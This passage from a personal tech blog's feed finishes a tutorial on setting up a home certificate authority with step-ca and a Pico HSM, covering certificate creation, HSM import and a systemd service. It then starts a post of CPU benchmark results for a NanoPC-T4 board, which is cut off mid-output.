class="punctuation">}</span></span><br></pre></td></tr></table></figure><p>Generate the intermediate CA private key </p><figure class="highlight bash"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ step certificate create \</span><br><span class="line"> <span class="string">"D9Lab Zero Intermediate CA"</span> \</span><br><span class="line"> intermediate-ca.crt \</span><br><span class="line"> intermediate_ca_key_enc \</span><br><span class="line"> --template intermediate.tpl \</span><br><span class="line"> --ca root-ca.crt \</span><br><span class="line"> --ca-kms <span class="string">'pkcs11:module-path=/usr/lib/opensc-pkcs11.so;serial=************?pin-value=648219'</span> \</span><br><span class="line"> --ca-key <span class="string">'pkcs11:id=03'</span> \</span><br><span class="line"> --not-before <span class="string">'2025-01-10T00:00:00+08:00'</span> \</span><br><span class="line"> --not-after <span class="string">'2030-01-10T00:00:00+08:00'</span> \</span><br><span class="line"> --kty=EC --curve=P-384</span><br></pre></td></tr></table></figure><p>Unplug the Canokey/YubiKey and plug the Pico HSM back in </p> </div><div id="intermediate-ca-file" class="tab-content is-hidden"> <p>Create the intermediate CA template </p><figure class="highlight json"><figcaption><span>intermediate.tpl</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"subject"</span><span class="punctuation">:</span> <span class="punctuation">{</span><span class="punctuation">{</span> toJson .Subject <span class="punctuation">}</span><span class="punctuation">}</span><span 
class="punctuation">,</span></span><br><span class="line"> <span class="attr">"keyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"certSign"</span><span class="punctuation">,</span> <span class="string">"crlSign"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"basicConstraints"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"isCA"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"maxPathLen"</span><span class="punctuation">:</span> <span class="number">0</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"crlDistributionPoints"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"http://ca.lab.d9lab.eu.org/1.0/crl"</span><span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><p>Generate the intermediate CA private key </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ step certificate create \</span><br><span class="line"> <span class="string">"D9Lab Zero Intermediate CA"</span> \</span><br><span class="line"> intermediate-ca.crt \</span><br><span class="line"> intermediate_ca_key_enc \</span><br><span class="line"> --template intermediate.tpl 
\</span><br><span class="line"> --ca root-ca.crt \</span><br><span class="line"> --ca-key root-ca-key.pem \</span><br><span class="line"> --not-before <span class="string">'2025-01-10T00:00:00+08:00'</span> \</span><br><span class="line"> --not-after <span class="string">'2030-01-10T00:00:00+08:00'</span> \</span><br><span class="line"> --kty=EC --curve=P-384</span><br></pre></td></tr></table></figure> </div><p>Package the certificate and private key into <code>p12</code> format </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ openssl ec -<span class="keyword">in</span> intermediate_ca_key_enc -out intermediate-ca-key.pem</span><br><span class="line"><span class="comment"># Note: you must set a password, otherwise the import will fail! </span></span><br><span class="line">$ openssl pkcs12 -<span class="built_in">export</span> -out intermediate-ca.p12 -inkey intermediate-ca-key.pem -<span class="keyword">in</span> intermediate-ca.crt -certfile root-ca.crt</span><br></pre></td></tr></table></figure><h3 id="将中间CA证书和密钥导入-pico-hsm"><a href="#将中间CA证书和密钥导入-pico-hsm" class="headerlink" title="将中间CA证书和密钥导入 pico-hsm"></a>Import the intermediate CA certificate and key into pico-hsm</h3><p>First, following the pico-hsm author's instructions, download and modify the SCS3 tool:<br><a href="https://github.com/polhenarejos/pico-hsm/blob/master/doc/scs3.md">https://github.com/polhenarejos/pico-hsm/blob/master/doc/scs3.md</a> </p><p>Then follow <a href="https://docs.nitrokey.com/nitrokeys/features/hsm/import-keys-certs#importing-via-the-scsh3-gui">docs.nitrokey.com</a> to import <code>intermediate-ca.p12</code> </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">Inside the unpacked directory you will find scsh3gui, which can be started using bash scsh3gui (for windows double-click on: scsh3gui.cmd).</span><br><span class="line"></span><br><span class="line">Start key-manager (File -> Keymanager)</span><br><span class="line">Right-click “Smartcard-HSM” -> create DKEK share</span><br><span class="line">Choose file location</span><br><span class="line">Choose DKEK share password</span><br><span class="line">Right-click “Smartcard-HSM” -> Initialize device</span><br><span class="line">Enter SO-PIN</span><br><span class="line">(optional) Enter label and enter URL/Host</span><br><span class="line">Select authentication method: “User PIN”</span><br><span class="line">Allow RESET RETRY COUNTER: “Resetting and unblocking PIN with SO-PIN not allowed”</span><br><span class="line">Enter and confirm User PIN</span><br><span class="line">“Select Device Key Encryption scheme” -> “DKEK shares”</span><br><span class="line">Enter number of DKEK shares: 1</span><br><span class="line">Right-click DKEK set-up in progress -> “Import DKEK share”</span><br><span class="line">Choose DKEK share file location</span><br><span class="line">Password for DKEK share</span><br><span class="line">Right-click “SmartCard-HSM” -> “Import from PKCS#12(Old)”</span><br><span class="line">Enter number of shares -> 1</span><br><span class="line">Enter file location of DKEK share</span><br><span class="line">Enter Password for DKEK 
share</span><br><span class="line">Select PKCS#12 container for import (Enter password)</span><br><span class="line">Select Key</span><br><span class="line">Select Name to be used (intermediate-ca)</span><br><span class="line">Import more keys, if needed</span><br></pre></td></tr></table></figure><p>After the import completes, running <code>pkcs11-tool -O</code> should show the imported certificate</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ pkcs11-tool -O</span><br><span class="line"> Using slot 0 with a present token (0x0)</span><br><span class="line"> Certificate Object; <span class="built_in">type</span> = X.509 cert</span><br><span class="line"> label: intermediate-ca</span><br><span class="line"> subject: DN: C=CN, O=D9Lab, OU=D9Lab Zero Certificate Authority, CN=D9Lab Zero Intermediate CA</span><br><span class="line"> ID: 01</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>Note down the <code>ID</code> and <code>label</code>; they will be needed later. </p><p>Pack these files into an encrypted 7z archive, generate a sufficiently long password with KeePass and save it, then store the archive on a cloud drive of your choice or burn it to a disc and keep it in your wardrobe. </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">intermediate-ca-key.pem</span><br><span class="line">intermediate-ca.crt</span><br><span class="line">intermediate-ca.p12</span><br><span class="line">pde file (DKEK)</span><br><span class="line">root-ca-key.pem</span><br><span class="line">root-ca.crt</span><br><span 
class="line">root-ca.p12</span><br></pre></td></tr></table></figure><p>Afterwards, keep only <code>intermediate-ca.crt</code> and <code>root-ca.crt</code>, and delete all the other files </p><h3 id="配置step-ca"><a href="#配置step-ca" class="headerlink" title="配置step-ca"></a>Configure step-ca</h3><p><a href="https://smallstep.com/docs/step-ca/cryptographic-protection/#pkcs-11">https://smallstep.com/docs/step-ca/cryptographic-protection/#pkcs-11</a> </p><p>Initialize </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> systemctl <span class="built_in">enable</span> pcscd</span><br><span class="line">$ <span class="built_in">sudo</span> systemctl start pcscd</span><br><span class="line">$ <span class="built_in">sudo</span> useradd step</span><br><span class="line">$ <span class="built_in">sudo</span> passwd -l step</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">mkdir</span> /etc/step-ca</span><br><span class="line">$ <span class="built_in">export</span> STEPPATH=/etc/step-ca</span><br><span class="line">$ <span class="built_in">sudo</span> --preserve-env step ca init --name=<span class="string">"D9Lab Zero CA"</span> \</span><br><span class="line"> --dns=<span class="string">"ca.lab.d9lab.eu.org"</span> --address=<span class="string">":4443"</span> 
\</span><br><span class="line"> --provisioner=<span class="string">"disappear9@outlook.com"</span> \</span><br><span class="line"> --deployment-type standalone \</span><br><span class="line"> --remote-management</span><br><span class="line"><span class="comment"># Make a note of the provisioner key you set</span></span><br><span class="line"></span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">rm</span> /etc/step-ca/certs/*</span><br><span class="line"><span class="comment"># Copy the saved intermediate-ca.crt and root-ca.crt to /etc/step-ca/certs/</span></span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">rm</span> -rf /etc/step-ca/secrets</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">chown</span> -R step:step /etc/step-ca</span><br><span class="line">$ step kms create --json --kms <span class="string">"pkcs11:module-path=/usr/lib/opensc-pkcs11.so;serial=ESPICOHSMTR?pin-value=648219"</span> <span class="string">"pkcs11:id=2000;object=ssh-host-ca"</span></span><br><span class="line">$ step kms create --json --kms <span class="string">"pkcs11:module-path=/usr/lib/opensc-pkcs11.so;serial=ESPICOHSMTR?pin-value=648219"</span> <span class="string">"pkcs11:id=2001;object=ssh-user-ca"</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Edit <code>/etc/step-ca/config/ca.json</code> </p><figure class="highlight json"><figcaption><span>ca.json</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"root"</span><span class="punctuation">:</span> <span class="string">"/etc/step-ca/certs/root-ca.crt"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"crt"</span><span class="punctuation">:</span> <span class="string">"/etc/step-ca/certs/intermediate-ca.crt"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"key"</span><span class="punctuation">:</span> <span class="string">"pkcs11:id=01;object=intermediate-ca"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"kms"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"type"</span><span class="punctuation">:</span> <span class="string">"pkcs11"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"uri"</span><span class="punctuation">:</span> <span class="string">"pkcs11:module-path=/usr/lib/opensc-pkcs11.so;serial=ESPICOHSMTR?pin-value=648219"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"ssh"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"hostKey"</span><span class="punctuation">:</span> <span class="string">"pkcs11:id=2000;object=ssh-host-ca"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"userKey"</span><span class="punctuation">:</span> <span class="string">"pkcs11:id=2001;object=ssh-user-ca"</span></span><br><span class="line"> <span class="punctuation">}</span></span><br><span class="line"><span class="punctuation">}</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Try running it </p><figure class="highlight 
bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Open a new window</span></span><br><span class="line">$ screen</span><br><span class="line">$ <span class="built_in">sudo</span> -u step step-ca /etc/step-ca/config/ca.json</span><br><span class="line"><span class="comment"># Note down the fingerprint value; it is used below</span></span><br></pre></td></tr></table></figure><p>Open a new window</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">unset</span> STEPPATH</span><br><span class="line">$ step ca bootstrap --ca-url <span class="string">"https://ca.lab.d9lab.eu.org:4443"</span> --fingerprint d6b3b9ef79a42aeeabcd5580b2b516458ddb25d1af4ea7ff0845e624ec1bb609</span><br><span class="line">The root certificate has been saved <span class="keyword">in</span> /home/disappear9/.step/certs/root_ca.crt.</span><br><span class="line">The authority configuration has been saved <span class="keyword">in</span> /home/disappear9/.step/config/defaults.json.</span><br><span class="line"></span><br><span class="line"><span class="comment"># Test whether a certificate can be issued normally</span></span><br><span class="line">$ step ca certificate <span class="string">"localhost"</span> localhost.crt localhost.key</span><br><span class="line">$ step ca provisioner add acme --<span class="built_in">type</span> acme --admin-name step</span><br></pre></td></tr></table></figure><h3 id="配置服务"><a href="#配置服务" class="headerlink" title="配置服务"></a>Configure the service</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">tee</span> /etc/udev/rules.d/75-picohsm.rules > /dev/null << <span class="string">EOF</span></span><br><span class="line"><span class="string">ACTION=="add", SUBSYSTEM=="usb", ENV{PRODUCT}=="20a0/4230/*", TAG+="systemd", SYMLINK+="picohsm"</span></span><br><span class="line"><span class="string">ACTION=="remove", SUBSYSTEM=="usb", ENV{PRODUCT}=="20a0/4230/*", TAG+="systemd"</span></span><br><span class="line"><span class="string">EOF</span></span><br><span class="line">$ <span class="built_in">sudo</span> udevadm control --reload-rules</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">tee</span> /etc/systemd/system/step-ca.service > /dev/null << <span class="string">EOF</span></span><br><span class="line"><span class="string">[Unit]</span></span><br><span class="line"><span class="string">Description=step-ca</span></span><br><span class="line"><span class="string">BindsTo=dev-picohsm.device</span></span><br><span 
class="line"><span class="string">After=dev-picohsm.device</span></span><br><span class="line"><span class="string">[Service]</span></span><br><span class="line"><span class="string">User=step</span></span><br><span class="line"><span class="string">Group=step</span></span><br><span class="line"><span class="string">ExecStart=/bin/sh -c '/usr/local/bin/step-ca /etc/step-ca/config/ca.json'</span></span><br><span class="line"><span class="string">Type=simple</span></span><br><span class="line"><span class="string">Restart=on-failure</span></span><br><span class="line"><span class="string">RestartSec=10</span></span><br><span class="line"><span class="string">[Install]</span></span><br><span class="line"><span class="string">WantedBy=multi-user.target</span></span><br><span class="line"><span class="string">EOF</span></span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">mkdir</span> /etc/systemd/system/dev-picohsm.device.wants</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">ln</span> -s /etc/systemd/system/step-ca.service /etc/systemd/system/dev-picohsm.device.wants/</span><br><span class="line">$ <span class="built_in">sudo</span> systemctl daemon-reload</span><br><span class="line">$ <span class="built_in">sudo</span> systemctl <span class="built_in">enable</span> step-ca</span><br><span class="line">$ <span class="built_in">sudo</span> init 6</span><br><span class="line"></span><br><span class="line"><span class="comment"># Check the service status</span></span><br><span class="line">$ systemctl status step-ca</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>(End)</p>]]></content>
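<summary type="html"><h3 id="引言"><a href="#引言" class="headerlink" title="引言"></a>Introduction</h3><p>A few days ago I saw a piece of software in the Canokey group: <a href="https://github.com/smallstep/certificates">step-ca</a><br>In short, this software lets you set up your own CA to play with, and it supports HSM devices</p>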
<hr>
<h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>Environment check</h3><p>Hardware:<br>&emsp;&emsp;OrangePi Zero3<br>&emsp;&emsp;Raspberry Pi Pico2<br>Operating system:<br>&emsp;&emsp;Armbian v25.11.2 6.12.58-current-sunxi64<br>Software versions:<br>&emsp;&emsp;go1.25.5<br>&emsp;&emsp;step-ca 0.29.0<br>&emsp;&emsp;OpenSC 0.26.1 </p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>FriendlyELEC NanoPC-T4 CPU Benchmark</title>
<link href="https://thinkalone.win/NanoPC-T4-CPU-Benchmark.html"/>
<id>https://thinkalone.win/NanoPC-T4-CPU-Benchmark.html</id>
<published>2025-09-30T04:00:00.000Z</published>
<updated>2025-09-30T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>CPU:Rockchip RK3399<br>RAM:4G </p><p>screenfetch </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@nanopct4</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P"" """Y$$.". Kernel: aarch64 Linux 6.12.44-current-rockchip64</span><br><span class="line"> ,$$P' `$$$. Uptime: 15m</span><br><span class="line">',$$P ,ggs. `$$b: Packages: 366</span><br><span class="line">`d$$' ,$P"' . $$$ Shell: bash</span><br><span class="line"> $$P d$' , $$P Disk: 4.8G / 485G (2%)</span><br><span class="line"> $$: $$. - ,d$$' CPU: ARM Cortex-A53 Cortex-A72 @ 6x 1.416GHz</span><br><span class="line"> $$\; Y$b._ _,d$P' RAM: 4G</span><br><span class="line"> Y$$. 
`.`"Y$$$$P"'</span><br><span class="line"> `$$b "-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `"Y$b._</span><br><span class="line"> `""""</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>7-zip 16.02:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">disappear9@nanopct4:~$ 7z b 
-mmt6</span><br><span class="line"></span><br><span class="line">7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,6 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: 64000000 64000000 - - - - - - -</span><br><span class="line"></span><br><span class="line">RAM size: 3852 MB, # CPU hardware threads: 6</span><br><span class="line">RAM usage: 1323 MB, # Benchmark threads: 6</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 4995 493 986 4860 | 93784 520 1538 7998</span><br><span class="line">23: 4735 503 960 4825 | 91755 520 1527 7940</span><br><span class="line">24: 4721 542 937 5077 | 89873 520 1517 7888</span><br><span class="line">25: 4656 574 926 5316 | 87341 519 1497 7773</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 528 952 5019 | 520 1520 7900</span><br><span class="line">Tot: 524 1236 6460</span><br><span class="line">disappear9@nanopct4:~$ 7z b -mmt1</span><br><span class="line"></span><br><span class="line">7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,6 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: - - - - - - 512000000 1024000000 -</span><br><span class="line"></span><br><span class="line">RAM size: 3852 MB, # CPU hardware threads: 6</span><br><span class="line">RAM usage: 435 MB, # Benchmark threads: 1</span><br><span class="line"></span><br><span class="line"> 
Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 1629 99 1598 1585 | 22693 100 1943 1938</span><br><span class="line">23: 1535 99 1579 1565 | 22323 100 1938 1932</span><br><span class="line">24: 1466 99 1590 1576 | 21931 100 1931 1925</span><br><span class="line">25: 1355 99 1562 1548 | 21440 100 1915 1908</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 99 1582 1568 | 100 1932 1926</span><br><span class="line">Tot: 99 1757 1747</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>phoronix-test-suite benchmark compress-7zip</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span 
class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line">disappear9@nanopct4:~$ ./phoronix-test-suite benchmark compress-7zip</span><br><span class="line"></span><br><span class="line"> pts/compress-7zip-1.12.0:</span><br><span class="line"></span><br><span class="line">System Information</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> PROCESSOR: ARMv8 Cortex-A72 @ 1.42GHz</span><br><span class="line"> Core Count: 4</span><br><span class="line"> Thread Count: 6</span><br><span class="line"> Scaling Driver: cpufreq-dt ondemand</span><br><span class="line"></span><br><span class="line"> GRAPHICS:</span><br><span class="line"></span><br><span class="line"> MOTHERBOARD: FriendlyElec NanoPC-T4</span><br><span class="line"> Chipset: Rockchip RK3399</span><br><span class="line"></span><br><span class="line"> MEMORY: 4096MB</span><br><span class="line"></span><br><span class="line"> DISK: 512GB SK hynix HFS512GDE9X084N + 16GB AJTD4R</span><br><span class="line"> File-System: ext4</span><br><span class="line"> Mount Options: commit=120 errors=remount-ro noatime 
rw</span><br><span class="line"> Disk Scheduler: NONE</span><br><span class="line"> Disk Details: Block Size: 4096</span><br><span class="line"></span><br><span class="line"> OPERATING SYSTEM: Debian 12</span><br><span class="line"> Kernel: 6.12.44-current-rockchip64 (aarch64)</span><br><span class="line"> Compiler: GCC 12.2.0</span><br><span class="line"> Security: gather_data_sampling: Not affected</span><br><span class="line"> + indirect_target_selection: Not affected</span><br><span class="line"> + itlb_multihit: Not affected</span><br><span class="line"> + l1tf: Not affected</span><br><span class="line"> + mds: Not affected</span><br><span class="line"> + meltdown: Not affected</span><br><span class="line"> + mmio_stale_data: Not affected</span><br><span class="line"> + reg_file_data_sampling: Not affected</span><br><span class="line"> + retbleed: Not affected</span><br><span class="line"> + spec_rstack_overflow: Not affected</span><br><span class="line"> + spec_store_bypass: Not affected</span><br><span class="line"> + spectre_v1: Mitigation of __user pointer sanitization</span><br><span class="line"> + spectre_v2: Vulnerable: Unprivileged eBPF enabled</span><br><span class="line"> + srbds: Not affected</span><br><span class="line"> + tsa: Not affected</span><br><span class="line"> + tsx_async_abort: Not affected</span><br><span class="line"></span><br><span class="line">7-Zip Compression 25.00:</span><br><span class="line"> pts/compress-7zip-1.12.0</span><br><span class="line"> Test 1 of 1</span><br><span class="line"> Estimated Trial Run Count: 3</span><br><span class="line"> Estimated Time To Completion: 4 Minutes [10:29 UTC]</span><br><span class="line"> Started Run 1 @ 10:25:56</span><br><span class="line"> Started Run 2 @ 10:27:30</span><br><span class="line"> Started Run 3 @ 10:29:03</span><br><span class="line"></span><br><span class="line"> Test: Compression Rating:</span><br><span class="line"> 6156</span><br><span class="line"> 6193</span><br><span 
class="line"> 6134</span><br><span class="line"></span><br><span class="line"> Average: 6161 MIPS</span><br><span class="line"> Deviation: 0.48%</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>sysbench </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span 